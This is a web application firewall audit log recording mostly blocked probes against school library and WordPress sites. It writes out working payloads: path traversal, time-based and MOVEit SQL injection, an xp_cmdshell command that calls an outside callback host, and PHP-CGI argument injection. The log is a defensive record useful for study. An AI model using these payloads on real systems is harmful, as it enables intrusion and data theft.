CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --910c2557-Z-- --b2155e1b-A-- [29/May/2025:12:44:59 +0700] aDf0W31Ye2lUDKzW1LvObQAAAAo 103.236.140.4 60934 103.236.140.4 8181 --b2155e1b-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 169378694 --b2155e1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2155e1b-E-- --b2155e1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497499099382 1730 (- - -) Stopwatch2: 1748497499099382 1730; combined=502, p1=355, p2=118, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2155e1b-Z-- --66fe3563-A-- [29/May/2025:13:13:48 +0700] aDf7HH1Ye2lUDKzW1LvPWQAAAAY 103.236.140.4 33702 103.236.140.4 8181 --66fe3563-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165250969 --66fe3563-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66fe3563-E-- --66fe3563-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748499228787952 1652 (- - -) Stopwatch2: 1748499228787952 1652; combined=508, p1=358, p2=123, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66fe3563-Z-- --052e590d-A-- [29/May/2025:13:56:14 +0700] aDgFDv4vV4CoZ0MKLMPmNwAAAJE 103.236.140.4 34384 103.236.140.4 8181 --052e590d-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165251052 --052e590d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --052e590d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748501774072928 2026 (- - -) Stopwatch2: 1748501774072928 2026; combined=832, p1=383, p2=420, p3=0, p4=0, p5=28, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --052e590d-Z-- --fb476d22-A-- [29/May/2025:13:56:14 +0700] aDgFDmMaQtTb69S13pj86gAAAFA 103.236.140.4 34396 103.236.140.4 8181 --fb476d22-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 84 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165251058 --fb476d22-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --fb476d22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb476d22-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748501774987403 2684 (- - -) Stopwatch2: 1748501774987403 2684; combined=1489, p1=367, p2=1095, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb476d22-Z-- --ba174e1e-A-- [29/May/2025:14:22:34 +0700] aDgLOmMaQtTb69S13pj9JAAAAFU 103.236.140.4 35082 103.236.140.4 8181 --ba174e1e-B-- POST /userentry?accountId=/../../../tomcat/webapps/UsTFY/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165251173 --ba174e1e-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --ba174e1e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba174e1e-E-- --ba174e1e-H-- Message: Access denied with code 403 (phase 2). 
Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503354784591 4660 (- - -) Stopwatch2: 1748503354784591 4660; combined=2660, p1=548, p2=2078, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba174e1e-Z-- --aaff8213-A-- [29/May/2025:14:22:51 +0700] aDgLS2MaQtTb69S13pj9KQAAAEc 103.236.140.4 35092 103.236.140.4 8181 --aaff8213-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/121.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=t10rqfl119b1qko2isb7q1l8j1 X-Varnish: 165251176 --aaff8213-C-- --aaff8213-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaff8213-E-- --aaff8213-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503371804356 3302 (- - -) Stopwatch2: 1748503371804356 3302; combined=1620, p1=437, p2=1154, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaff8213-Z-- --59ff8458-A-- [29/May/2025:14:23:04 +0700] aDgLWGMaQtTb69S13pj9LQAAAEg 103.236.140.4 35112 103.236.140.4 8181 --59ff8458-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xjRiLJcsWiGWNHgy7ScqF2Ou42');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=t10rqfl119b1qko2isb7q1l8j1 X-Varnish: 154632602 --59ff8458-C-- --59ff8458-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close 
Content-Type: text/html; charset=iso-8859-1 --59ff8458-E-- --59ff8458-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503384787100 3112 (- - -) Stopwatch2: 1748503384787100 3112; combined=1530, p1=459, p2=1041, p3=0, p4=0, p5=29, sr=83, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59ff8458-Z-- --02cbf668-A-- [29/May/2025:14:24:05 +0700] aDgLlWMaQtTb69S13pj9NgAAAFU 103.236.140.4 35132 103.236.140.4 8181 --02cbf668-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.230.172.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.230.172.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02cbf668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02cbf668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503445478105 2531 (- - -) Stopwatch2: 1748503445478105 2531; combined=1167, p1=418, p2=719, p3=0, p4=0, p5=29, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02cbf668-Z-- --4b3a635b-A-- [29/May/2025:14:25:02 +0700] aDgLzf4vV4CoZ0MKLMPmYQAAAI8 103.236.140.4 35152 103.236.140.4 8181 --4b3a635b-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/127.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154632608 --4b3a635b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b3a635b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503501998018 2536 (- - -) Stopwatch2: 1748503501998018 2536; combined=924, p1=458, p2=389, p3=0, p4=0, p5=77, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b3a635b-Z-- --a6c3150d-A-- [29/May/2025:14:25:10 +0700] aDgL1sX5pbyFXv2T3ipiNAAAANY 103.236.140.4 35196 103.236.140.4 8181 --a6c3150d-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 154632626 --a6c3150d-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a6c3150d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c3150d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503510066768 2736 (- - -) Stopwatch2: 1748503510066768 2736; combined=1506, p1=384, p2=1093, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c3150d-Z-- --b3cbb421-A-- [29/May/2025:14:38:54 +0700] aDgPDv4vV4CoZ0MKLMPmjwAAAIk 103.236.140.4 35574 103.236.140.4 8181 --b3cbb421-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 775 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166791101 --b3cbb421-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0rjil9gpeoh536h8tf0xh63s4uacz8e9.oast.live'-- --b3cbb421-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3cbb421-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748504334077077 3426 (- - -) Stopwatch2: 1748504334077077 3426; combined=2154, p1=471, p2=1608, p3=23, p4=25, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3cbb421-Z-- --c2262b46-A-- [29/May/2025:15:10:57 +0700] aDgWkWMaQtTb69S13pgG1QAAAEg 103.236.140.4 41304 103.236.140.4 8181 --c2262b46-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.177.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.177.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2262b46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2262b46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748506257234531 2850 (- - -) Stopwatch2: 1748506257234531 2850; combined=1462, p1=407, p2=999, p3=0, p4=0, p5=55, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2262b46-Z-- --e414815f-A-- [29/May/2025:15:23:52 +0700] aDgZmMX5pbyFXv2T3ipymAAAANI 103.236.140.4 51980 103.236.140.4 8181 --e414815f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.64.20 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.64.20 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e414815f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin& --e414815f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --e414815f-E-- --e414815f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748507032051333 5988 (- - -) Stopwatch2: 1748507032051333 5988; combined=4326, p1=476, p2=3639, p3=28, p4=33, p5=90, sr=86, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e414815f-Z-- --7326b724-A-- [29/May/2025:15:29:37 +0700] aDga8cX5pbyFXv2T3ip3CAAAAMU 103.236.140.4 40504 103.236.140.4 8181 --7326b724-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169379742 --7326b724-C-- --7326b724-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7326b724-E-- --7326b724-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
